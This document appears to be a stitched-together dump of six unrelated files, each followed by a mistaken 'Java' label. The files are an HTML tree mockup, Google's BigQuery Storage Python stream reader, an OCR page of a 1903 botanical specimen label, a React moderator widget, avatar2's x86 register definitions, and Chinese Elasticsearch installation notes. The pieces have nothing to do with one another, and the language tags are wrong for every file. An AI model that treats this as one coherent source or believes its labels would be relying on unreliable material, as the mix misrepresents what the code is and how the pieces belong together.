<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../../../../../src/css/29tree.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="tree" id="c1"> <div class="root open"> <div class="tag"> <div class="text">XLib</div> </div> <div class="childs"> <div class="folder normal open"> <div class="tag"> <div class="text">base</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> <div class="folder normal close"> <div class="tag"> <div class="text">ui</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div 
class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> <div class="folder last close"> <div class="tag"> <div class="text">grid</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> </div> </div> </div> </body> </html>
Java
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import import collections import io import json import time try: import fastavro except ImportError: # pragma: NO COVER fastavro = None import google.api_core.exceptions import google.rpc.error_details_pb2 try: import pandas except ImportError: # pragma: NO COVER pandas = None try: import pyarrow except ImportError: # pragma: NO COVER pyarrow = None try: import pyarrow except ImportError: # pragma: NO COVER pyarrow = None _STREAM_RESUMPTION_EXCEPTIONS = ( google.api_core.exceptions.ServiceUnavailable, # Caused by transport-level error. No status code was received. # https://github.com/googleapis/python-bigquery-storage/issues/262 google.api_core.exceptions.Unknown, ) # The Google API endpoint can unexpectedly close long-running HTTP/2 streams. # Unfortunately, this condition is surfaced to the caller as an internal error # by gRPC. We don't want to resume on all internal errors, so instead we look # for error message that we know are caused by problems that are safe to # reconnect. _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES = ( # See: https://github.com/googleapis/google-cloud-python/pull/9994 "RST_STREAM", ) _FASTAVRO_REQUIRED = ( "fastavro is required to parse ReadRowResponse messages with Avro bytes." ) _PANDAS_REQUIRED = "pandas is required to create a DataFrame" _PYARROW_REQUIRED = ( "pyarrow is required to parse ReadRowResponse messages with Arrow bytes." 
) class ReadRowsStream(object): """A stream of results from a read rows request. This stream is an iterable of :class:`~google.cloud.bigquery_storage_v1.types.ReadRowsResponse`. Iterate over it to fetch all row messages. If the fastavro library is installed, use the :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.rows()` method to parse all messages into a stream of row dictionaries. If the pandas and fastavro libraries are installed, use the :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.to_dataframe()` method to parse all messages into a :class:`pandas.DataFrame`. This object should not be created directly, but is returned by other methods in this library. """ def __init__( self, client, name, offset, read_rows_kwargs, retry_delay_callback=None ): """Construct a ReadRowsStream. Args: client ( \ ~google.cloud.bigquery_storage_v1.services. \ big_query_read.BigQueryReadClient \ ): A GAPIC client used to reconnect to a ReadRows stream. This must be the GAPIC client to avoid a circular dependency on this class. name (str): Required. Stream ID from which rows are being read. offset (int): Required. Position in the stream to start reading from. The offset requested must be less than the last row read from ReadRows. Requesting a larger offset is undefined. read_rows_kwargs (dict): Keyword arguments to use when reconnecting to a ReadRows stream. retry_delay_callback (Optional[Callable[[float], None]]): If the client receives a retryable error that asks the client to delay its next attempt and retry_delay_callback is not None, ReadRowsStream will call retry_delay_callback with the delay duration (in seconds) before it starts sleeping until the next attempt. Returns: Iterable[ \ ~google.cloud.bigquery_storage.types.ReadRowsResponse \ ]: A sequence of row messages. """ # Make a copy of the read position so that we can update it without # mutating the original input. 
self._client = client self._name = name self._offset = offset self._read_rows_kwargs = read_rows_kwargs self._retry_delay_callback = retry_delay_callback self._wrapped = None def __iter__(self): """An iterable of messages. Returns: Iterable[ \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ]: A sequence of row messages. """ # Infinite loop to reconnect on reconnectable errors while processing # the row stream. if self._wrapped is None: self._reconnect() while True: try: for message in self._wrapped: rowcount = message.row_count self._offset += rowcount yield message return # Made it through the whole stream. except google.api_core.exceptions.InternalServerError as exc: resumable_error = any( resumable_message in exc.message for resumable_message in _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES ) if not resumable_error: raise except _STREAM_RESUMPTION_EXCEPTIONS: # Transient error, so reconnect to the stream. pass except Exception as exc: if not self._resource_exhausted_exception_is_retryable(exc): raise self._reconnect() def _reconnect(self): """Reconnect to the ReadRows stream using the most recent offset.""" while True: try: self._wrapped = self._client.read_rows( read_stream=self._name, offset=self._offset, **self._read_rows_kwargs ) break except Exception as exc: if not self._resource_exhausted_exception_is_retryable(exc): raise def _resource_exhausted_exception_is_retryable(self, exc): if isinstance(exc, google.api_core.exceptions.ResourceExhausted): # ResourceExhausted errors are only retried if a valid # RetryInfo is provided with the error. # # TODO: Remove hasattr logic when we require google-api-core >= 2.2.0. # ResourceExhausted added details/_details in google-api-core 2.2.0. 
details = None if hasattr(exc, "details"): details = exc.details elif hasattr(exc, "_details"): details = exc._details if details is not None: for detail in details: if isinstance(detail, google.rpc.error_details_pb2.RetryInfo): retry_delay = detail.retry_delay if retry_delay is not None: delay = max( 0, float(retry_delay.seconds) + (float(retry_delay.nanos) / 1e9), ) if self._retry_delay_callback: self._retry_delay_callback(delay) time.sleep(delay) return True return False def rows(self, read_session=None): """Iterate over all rows in the stream. This method requires the fastavro library in order to parse row messages in avro format. For arrow format messages, the pyarrow library is required. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: read_session ( \ Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. Returns: Iterable[Mapping]: A sequence of rows, represented as dictionaries. """ return ReadRowsIterable(self, read_session=read_session) def to_arrow(self, read_session=None): """Create a :class:`pyarrow.Table` of all rows in the stream. This method requires the pyarrow library and a stream using the Arrow format. Args: read_session ( \ ~google.cloud.bigquery_storage_v1.types.ReadSession \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. Returns: pyarrow.Table: A table of all rows in the stream. """ return self.rows(read_session=read_session).to_arrow() def to_dataframe(self, read_session=None, dtypes=None): """Create a :class:`pandas.DataFrame` of all rows in the stream. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. 
warning:: DATETIME columns are not supported. They are currently parsed as strings. Args: read_session ( \ ~google.cloud.bigquery_storage_v1.types.ReadSession \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ if pandas is None: raise ImportError(_PANDAS_REQUIRED) return self.rows(read_session=read_session).to_dataframe(dtypes=dtypes) class ReadRowsIterable(object): """An iterable of rows from a read session. Args: reader (google.cloud.bigquery_storage_v1.reader.ReadRowsStream): A read rows stream. read_session ( \ Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. """ # This class is modelled after the google.cloud.bigquery.table.RowIterator # and aims to be API compatible where possible. def __init__(self, reader, read_session=None): self._reader = reader if read_session is not None: self._stream_parser = _StreamParser.from_read_session(read_session) else: self._stream_parser = None @property def pages(self): """A generator of all pages in the stream. Returns: types.GeneratorType[google.cloud.bigquery_storage_v1.ReadRowsPage]: A generator of pages. """ # Each page is an iterator of rows. But also has num_items, remaining, # and to_dataframe. for message in self._reader: # Only the first message contains the schema, which is needed to # decode the messages. 
if not self._stream_parser: self._stream_parser = _StreamParser.from_read_rows_response(message) yield ReadRowsPage(self._stream_parser, message) def __iter__(self): """Iterator for each row in all pages.""" for page in self.pages: for row in page: yield row def to_arrow(self): """Create a :class:`pyarrow.Table` of all rows in the stream. This method requires the pyarrow library and a stream using the Arrow format. Returns: pyarrow.Table: A table of all rows in the stream. """ record_batches = [] for page in self.pages: record_batches.append(page.to_arrow()) if record_batches: return pyarrow.Table.from_batches(record_batches) # No data, return an empty Table. self._stream_parser._parse_arrow_schema() return pyarrow.Table.from_batches([], schema=self._stream_parser._schema) def to_dataframe(self, dtypes=None): """Create a :class:`pandas.DataFrame` of all rows in the stream. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ if pandas is None: raise ImportError(_PANDAS_REQUIRED) if dtypes is None: dtypes = {} # If it's an Arrow stream, calling to_arrow, then converting to a # pandas dataframe is about 2x faster. This is because pandas.concat is # rarely no-copy, whereas pyarrow.Table.from_batches + to_pandas is # usually no-copy. 
try: record_batch = self.to_arrow() except NotImplementedError: pass else: df = record_batch.to_pandas() for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column]) return df frames = [page.to_dataframe(dtypes=dtypes) for page in self.pages] if frames: return pandas.concat(frames) # No data, construct an empty dataframe with columns matching the schema. # The result should be consistent with what an empty ARROW stream would produce. self._stream_parser._parse_avro_schema() schema = self._stream_parser._avro_schema_json column_dtypes = self._dtypes_from_avro(schema["fields"]) column_dtypes.update(dtypes) df = pandas.DataFrame(columns=column_dtypes.keys()) for column in df: df[column] = pandas.Series([], dtype=column_dtypes[column]) return df def _dtypes_from_avro(self, avro_fields): """Determine Pandas dtypes for columns in Avro schema. Args: avro_fields (Iterable[Mapping[str, Any]]): Avro fields' metadata. Returns: colelctions.OrderedDict[str, str]: Column names with their corresponding Pandas dtypes. """ result = collections.OrderedDict() type_map = {"long": "int64", "double": "float64", "boolean": "bool"} for field_info in avro_fields: # If a type is an union of multiple types, pick the first type # that is not "null". if isinstance(field_info["type"], list): type_info = next(item for item in field_info["type"] if item != "null") if isinstance(type_info, str): field_dtype = type_map.get(type_info, "object") else: logical_type = type_info.get("logicalType") if logical_type == "timestamp-micros": field_dtype = "datetime64[ns, UTC]" else: field_dtype = "object" result[field_info["name"]] = field_dtype return result class ReadRowsPage(object): """An iterator of rows from a read session message. Args: stream_parser (google.cloud.bigquery_storage_v1.reader._StreamParser): A helper for parsing messages into rows. message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse): A message of data from a read rows stream. 
""" # This class is modeled after google.api_core.page_iterator.Page and aims # to provide API compatibility where possible. def __init__(self, stream_parser, message): self._stream_parser = stream_parser self._message = message self._iter_rows = None self._num_items = self._message.row_count self._remaining = self._message.row_count def _parse_rows(self): """Parse rows from the message only once.""" if self._iter_rows is not None: return rows = self._stream_parser.to_rows(self._message) self._iter_rows = iter(rows) @property def num_items(self): """int: Total items in the page.""" return self._num_items @property def remaining(self): """int: Remaining items in the page.""" return self._remaining def __iter__(self): """A ``ReadRowsPage`` is an iterator.""" return self def next(self): """Get the next row in the page.""" self._parse_rows() if self._remaining > 0: self._remaining -= 1 return next(self._iter_rows) # Alias needed for Python 2/3 support. __next__ = next def to_arrow(self): """Create an :class:`pyarrow.RecordBatch` of rows in the page. Returns: pyarrow.RecordBatch: Rows from the message, as an Arrow record batch. """ return self._stream_parser.to_arrow(self._message) def to_dataframe(self, dtypes=None): """Create a :class:`pandas.DataFrame` of rows in the page. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. 
""" if pandas is None: raise ImportError(_PANDAS_REQUIRED) return self._stream_parser.to_dataframe(self._message, dtypes=dtypes) class _StreamParser(object): def to_arrow(self, message): raise NotImplementedError("Not implemented.") def to_dataframe(self, message, dtypes=None): raise NotImplementedError("Not implemented.") def to_rows(self, message): raise NotImplementedError("Not implemented.") def _parse_avro_schema(self): raise NotImplementedError("Not implemented.") def _parse_arrow_schema(self): raise NotImplementedError("Not implemented.") @staticmethod def from_read_session(read_session): schema_type = read_session._pb.WhichOneof("schema") if schema_type == "avro_schema": return _AvroStreamParser(read_session) elif schema_type == "arrow_schema": return _ArrowStreamParser(read_session) else: raise TypeError( "Unsupported schema type in read_session: {0}".format(schema_type) ) @staticmethod def from_read_rows_response(message): schema_type = message._pb.WhichOneof("schema") if schema_type == "avro_schema": return _AvroStreamParser(message) elif schema_type == "arrow_schema": return _ArrowStreamParser(message) else: raise TypeError( "Unsupported schema type in message: {0}".format(schema_type) ) class _AvroStreamParser(_StreamParser): """Helper to parse Avro messages into useful representations.""" def __init__(self, message): """Construct an _AvroStreamParser. Args: message (Union[ google.cloud.bigquery_storage_v1.types.ReadSession, \ google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \ ]): Either the first message of data from a read rows stream or a read session. Both types contain a oneof "schema" field, which can be used to determine how to deserialize rows. """ if fastavro is None: raise ImportError(_FASTAVRO_REQUIRED) self._first_message = message self._avro_schema_json = None self._fastavro_schema = None self._column_names = None def to_arrow(self, message): """Create an :class:`pyarrow.RecordBatch` of rows in the page. 
Args: message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse): Protocol buffer from the read rows stream, to convert into an Arrow record batch. Returns: pyarrow.RecordBatch: Rows from the message, as an Arrow record batch. """ raise NotImplementedError("to_arrow not implemented for Avro streams.") def to_dataframe(self, message, dtypes=None): """Create a :class:`pandas.DataFrame` of rows in the page. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: message ( \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ): A message containing Avro bytes to parse into a pandas DataFrame. dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. 
""" self._parse_avro_schema() if dtypes is None: dtypes = {} columns = collections.defaultdict(list) for row in self.to_rows(message): for column in row: columns[column].append(row[column]) for column in dtypes: columns[column] = pandas.Series(columns[column], dtype=dtypes[column]) return pandas.DataFrame(columns, columns=self._column_names) def _parse_avro_schema(self): """Extract and parse Avro schema from a read session.""" if self._avro_schema_json: return self._avro_schema_json = json.loads(self._first_message.avro_schema.schema) self._column_names = tuple( (field["name"] for field in self._avro_schema_json["fields"]) ) self._first_message = None def _parse_fastavro(self): """Convert parsed Avro schema to fastavro format.""" self._parse_avro_schema() self._fastavro_schema = fastavro.parse_schema(self._avro_schema_json) def to_rows(self, message): """Parse all rows in a stream message. Args: message ( \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ): A message containing Avro bytes to parse into rows. Returns: Iterable[Mapping]: A sequence of rows, represented as dictionaries. """ self._parse_fastavro() messageio = io.BytesIO(message.avro_rows.serialized_binary_rows) while True: # Loop in a while loop because schemaless_reader can only read # a single record. try: # TODO: Parse DATETIME into datetime.datetime (no timezone), # instead of as a string. yield fastavro.schemaless_reader(messageio, self._fastavro_schema) except StopIteration: break # Finished with message class _ArrowStreamParser(_StreamParser): def __init__(self, message): """Construct an _ArrowStreamParser. Args: message (Union[ google.cloud.bigquery_storage_v1.types.ReadSession, \ google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \ ]): Either the first message of data from a read rows stream or a read session. Both types contain a oneof "schema" field, which can be used to determine how to deserialize rows. 
""" if pyarrow is None: raise ImportError(_PYARROW_REQUIRED) self._first_message = message self._schema = None def to_arrow(self, message): return self._parse_arrow_message(message) def to_rows(self, message): record_batch = self._parse_arrow_message(message) # Iterate through each column simultaneously, and make a dict from the # row values for row in zip(*record_batch.columns): yield dict(zip(self._column_names, row)) def to_dataframe(self, message, dtypes=None): record_batch = self._parse_arrow_message(message) if dtypes is None: dtypes = {} df = record_batch.to_pandas() for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column]) return df def _parse_arrow_message(self, message): self._parse_arrow_schema() return pyarrow.ipc.read_record_batch( pyarrow.py_buffer(message.arrow_record_batch.serialized_record_batch), self._schema, ) def _parse_arrow_schema(self): if self._schema: return self._schema = pyarrow.ipc.read_schema( pyarrow.py_buffer(self._first_message.arrow_schema.serialized_schema) ) self._column_names = [field.name for field in self._schema] self._first_message = None
Java
<html> <head> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <span class='rank0 0.0'>?Y0V</span> </br> <span class='rank4 4.488678160318237'>BOTANIC</span> <span class='rank0 0.0'>A</span> </br> <span class='rank0 0.0'>S¨'Ç</span> </br> <span class='rank8 8.229688880941637'>Wmm</span> </br> <span class='rank6 6.033766030327724'>THE</span> <span class='rank5 5.23758013687111'>NEW</span> <span class='rank5 5.092407184714711'>YORK</span> <span class='rank4 4.3452095742978045'>BOTANICAL</span> <span class='rank5 4.836230413135688'>GARDEN</span> </br> <span class='rank2 2.3388802077460475'>Plants</span> <span class='rank17 16.624349504197816'>oolleoteo</span> <span class='rank5 5.3627373972535715'>in</span> <span class='rank5 4.551609905707915'>the</span> <span class='rank-5 -5.170260790072973'>Republio</span> <span class='rank6 6.129628052059067'>of</span> <span class='rank21 21.233121605410794'>Hayti</span> <span class='rank7 7.495719705861437'>by</span> <span class='rank0 -0.2451656111325633'>George</span> <span class='rank10 10.021448350169694'>V.</span> <span class='rank-1 -0.5281890597046726'>Nash,</span> <span class='rank4 3.522999256660679'>1903</span> </br> <span class='rank4 4.079395259471763'>PORT</span> <span class='rank15 15.0908332066196'>MARGOT</span> <span class='rank7 6.555712447369967'>TO</span> <span class='rank22 22.325897378282733'>CORREIL,</span> <span class='rank7 6.807446127280642'>AUG.</span> </br> <span class='rank6 5.910214491268059'>New</span> <span class='rank5 5.027215308896533'>York</span> <span class='rank3 2.5421264334187086'>Botanical</span> <span class='rank3 3.451197890939337'>Garden</span> </br> <span class='rank0 0.0'>6</span> <span class='rank0 0.0'>7</span> <span class='rank0 0.0'>8</span> <span class='rank0 0.0'>9</span> <span class='rank6 5.886281793427337'>10</span> <span class='rank0 0.0'>T</span> <span class='rank0 0.0'>ã</span> <span class='rank0 0.0'>v</span> </br> <span class='rank0 0.0'>?f</span> 
<span class='rank5 5.380675333968457'>The</span> <span class='rank6 5.910214491268059'>New</span> <span class='rank5 5.027215308896533'>York</span> <span class='rank4 4.050174224831018'>copyright</span> <span class='rank2 1.7822710117187128'>reserved</span> <span class='rank0 -0.3482453244774675'>botanical</span> <span class='rank3 3.451197890939337'>Garden</span> </br> <span class='rank18 17.536343746729663'>1622564</span> </br> </br></br> <strong>Legend - </strong> Level of confidence that token is an accurately-transcribed word</br> <span class='rank-13'>&nbsp;&nbsp;&nbsp;</span> extremely low <span class='rank-7'>&nbsp;&nbsp;&nbsp;</span> very low <span class='rank-1'>&nbsp;&nbsp;&nbsp;</span> low <span class='rank0'>&nbsp;&nbsp;&nbsp;</span> undetermined <span class='rank1'>&nbsp;&nbsp;&nbsp;</span> medium <span class='rank6'>&nbsp;&nbsp;&nbsp;</span> high <span class='rank16'>&nbsp;&nbsp;&nbsp;</span> very high</br> </body> </html>
Java
/* Copyright 2019 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ import { Map, Set } from 'immutable'; import React from 'react'; import { Link } from 'react-router-dom'; import { OpenInNew, PersonAdd } from '@material-ui/icons/'; import { IArticleModel, ICategoryModel, IUserModel, ModelId } from '../../../models'; import { Avatar, MagicTimestamp, PseudoAvatar } from '../../components'; import { COMMON_STYLES, IMAGE_BASE } from '../../stylesx'; import { css, stylesheet } from '../../utilx'; interface IModeratorsWidgetProps { users: Map<string, IUserModel>; moderatorIds: Array<ModelId>; superModeratorIds: Array<ModelId>; openSetModerators(): void; } export const MODERATOR_WIDGET_STYLES = stylesheet({ widget: { display: 'flex', flexWrap: 'wrap', justifyContent: 'center', }, }); export function ModeratorsWidget(props: IModeratorsWidgetProps) { const { users, moderatorIds, superModeratorIds } = props; let s = Set(moderatorIds); if (superModeratorIds) { s = s.merge(superModeratorIds); } const moderators = s.toArray().map((uid: string) => users.get(uid)); if (moderators.length === 0) { return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> <PseudoAvatar size={IMAGE_BASE}> <PersonAdd/> </PseudoAvatar> </div> ); } if (moderators.length === 1) { const u = moderators[0]; return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> <Avatar target={u} size={IMAGE_BASE}/> </div> ); } const ret = []; let limit = moderators.length; let 
extra = false; if (limit > 4) { limit = 3; extra = true; } else if (limit === 4) { limit = 4; } for (let i = 0; i < limit; i++) { ret.push(<Avatar target={moderators[i]} size={IMAGE_BASE / 2}/>); } if (extra) { ret.push(<PseudoAvatar size={IMAGE_BASE / 2}>+{moderators.length - 3}</PseudoAvatar>); } return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> {ret} </div> ); } export const TITLE_CELL_STYLES = stylesheet({ superText: { fontSize: '10px', fontWeight: '600', color: 'rgba(0,0,0,0.54)', }, categoryLabel: { textTransform: 'uppercase', marginRight: '12px', }, mainText: { display: 'flex', }, mainTextText: { lineHeight: '20px', }, mainTextLink: { padding: '0 10px', color: 'rgba(0,0,0,0.54)', }, }); interface ITitleCellProps { category?: ICategoryModel; article: IArticleModel; link: string; } export function TitleCell(props: ITitleCellProps) { const { category, article, link, } = props; const supertext = []; if (category) { supertext.push(<span key="label" {...css(TITLE_CELL_STYLES.categoryLabel)}>{category.label}</span>); } if (article.sourceCreatedAt) { supertext.push(( <span key="timestamp"> <MagicTimestamp timestamp={article.sourceCreatedAt} inFuture={false}/> </span> )); } return ( <> {supertext.length > 0 && <div {...css(TITLE_CELL_STYLES.superText)}>{supertext}</div>} <div {...css(TITLE_CELL_STYLES.mainText)}> <div> <Link to={link} {...css(COMMON_STYLES.cellLink, TITLE_CELL_STYLES.mainTextText)}> {article.title} </Link> </div> {article.url && ( <div {...css(TITLE_CELL_STYLES.mainTextLink)}> <a key="link" href={article.url} target="_blank" {...css(COMMON_STYLES.cellLink)}> <OpenInNew fontSize="small" /> </a> </div> )} </div> </> ); }
Java
from capstone import *
from .architecture import Architecture
from avatar2.installer.config import GDB_X86, OPENOCD


class X86(Architecture):
    """Architecture description for 32-bit x86 targets.

    Exposes the gdb/QEMU naming, the general-purpose register map and the
    SSE/AVX "special" registers that must be read via gdb expressions rather
    than the plain register file.
    """

    get_gdb_executable = Architecture.resolve(GDB_X86)
    get_oocd_executable = Architecture.resolve(OPENOCD)

    qemu_name = 'i386'
    gdb_name = 'i386'

    # Register name -> gdb register index.  'pc' aliases 'eip'.
    registers = {'eax': 0,
                 'ecx': 1,
                 'edx': 2,
                 'ebx': 3,
                 'esp': 4,
                 'ebp': 5,
                 'esi': 6,
                 'edi': 7,
                 'eip': 8,
                 'pc': 8,
                 'eflags': 9,
                 'cs': 10,
                 'ss': 11,
                 'ds': 12,
                 'es': 13,
                 'fs': 14,
                 'gs': 15,
                 }

    # SSE (xmm0-xmm15) and AVX (ymm0-ymm15) registers.  The entries were
    # previously hand-copied 32 times; generate them instead so the format
    # string and gdb expression can never drift apart between registers.
    special_registers = {}
    for _i in range(16):
        # SSE: four 32-bit lanes.
        special_registers['xmm%d' % _i] = {
            'format': '{{{:d}, {:d}, {:d}, {:d}}}',
            'gdb_expression': '$xmm%d.v4_int32' % _i,
        }
        # AVX: eight 32-bit lanes.
        special_registers['ymm%d' % _i] = {
            'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}',
            'gdb_expression': '$ymm%d.v8_int32' % _i,
        }
    del _i  # keep the loop variable out of the class namespace

    sr_name = 'eflags'
    unemulated_instructions = []
    capstone_arch = CS_ARCH_X86
    capstone_mode = CS_MODE_32
    word_size = 32


class X86_64(X86):
    """Architecture description for 64-bit x86 targets.

    Inherits the special (SSE/AVX) registers and capstone architecture from
    :class:`X86`, overriding only what differs in 64-bit mode.
    """

    qemu_name = 'x86_64'
    gdb_name = 'i386:x86-64'

    # Register name -> gdb register index.  'pc' aliases 'rip'.
    registers = {'rax': 0,
                 'rbx': 1,
                 'rcx': 2,
                 'rdx': 3,
                 'rsi': 4,
                 'rdi': 5,
                 'rbp': 6,
                 'rsp': 7,
                 'r8': 8,
                 'r9': 9,
                 'r10': 10,
                 'r11': 11,
                 'r12': 12,
                 'r13': 13,
                 'r14': 14,
                 'r15': 15,
                 'rip': 16,
                 'pc': 16,
                 'eflags': 17,
                 'cs': 18,
                 'ss': 19,
                 'ds': 20,
                 'es': 21,
                 'fs': 22,
                 'gs': 23,
                 }

    # The original class assigned capstone_mode twice and redundantly
    # re-declared unemulated_instructions (already [] on X86); both cleaned up.
    capstone_mode = CS_MODE_64
    word_size = 64
Java
# Elasticsearch 安装记录

## Elasticsearch 介绍

Elasticsearch是一个基于Java的实时分布式搜索和分析引擎,能够对数据进行实时处理、分析。<br>
本次安装的操作系统环境为**Ubuntu 16.04 64bit**,将按照[《Elasticsearch权威指南》](https://github.com/looly/elasticsearch-definitive-guide-cn)中的流程进行。

## Java环境

在终端输入
```sh
sudo apt-get install default-jre
```
安装最新版本的Java运行环境。安装结束后可输入
```sh
java -version
```
检查是否安装成功。如果安装成功,会返回Java的版本号,如1.8.0_131。<br><br>
*注:需要注意的是,如果Ubuntu的更新源选择不恰当,极有可能安装失败。aliyun的源实测可用,建议在安装前换源。*

## 运行Elasticsearch

### 方式一:通过下载安装包

从官方网站 https://www.elastic.co/downloads/elasticsearch 下载最新版本的Elasticsearch。<br><br>
拷贝tar包至工作目录后,输入
```sh
tar -xvf elasticsearch-$VERSION.tar.gz
```
解压文件,其中将$VERSION替换为当前版本号。<br><br>
输入
```sh
./elasticsearch-$VERSION/bin/elasticsearch
```
运行Elasticsearch。<br><br>
*注:如果需要在后台运行,添加命令行参数-d即可。*<br><br>
稍等片刻,运行成功会显示
```sh
[0] indices into cluster_state
```

### 方式二:通过Debian Package

部分操作与后续安装Kibana相同,执行一次即可。<br><br>
默认安装目录为 /usr/share/elasticsearch/。<br><br>
Import the Elasticsearch PGP Key
```sh
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
```
Installing from the APT repository
```sh
sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list
```
Install the Elasticsearch Debian package
```sh
sudo apt-get update && sudo apt-get install elasticsearch
```
需要注意的是,此时不能以root权限直接运行可执行文件,而应通过服务启动:
```sh
service elasticsearch start
```

### 验证安装

此时另开启一个终端,输入
```sh
curl 'http://localhost:9200'
```
检验Elasticsearch是否运行,若正在运行则会返回(文本可能由于版本差异不同)
```json
{
  "name" : "RcmBSMl",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "M6u8eyc8QF6cIAWOh0RkMQ",
  "version" : {
    "number" : "5.5.0",
    "build_hash" : "260387d",
    "build_date" : "2017-06-30T23:16:05.735Z",
    "build_snapshot" : false,
    "lucene_version" : "6.6.0"
  },
  "tagline" : "You Know, for Search"
}
```

## 运行Demo

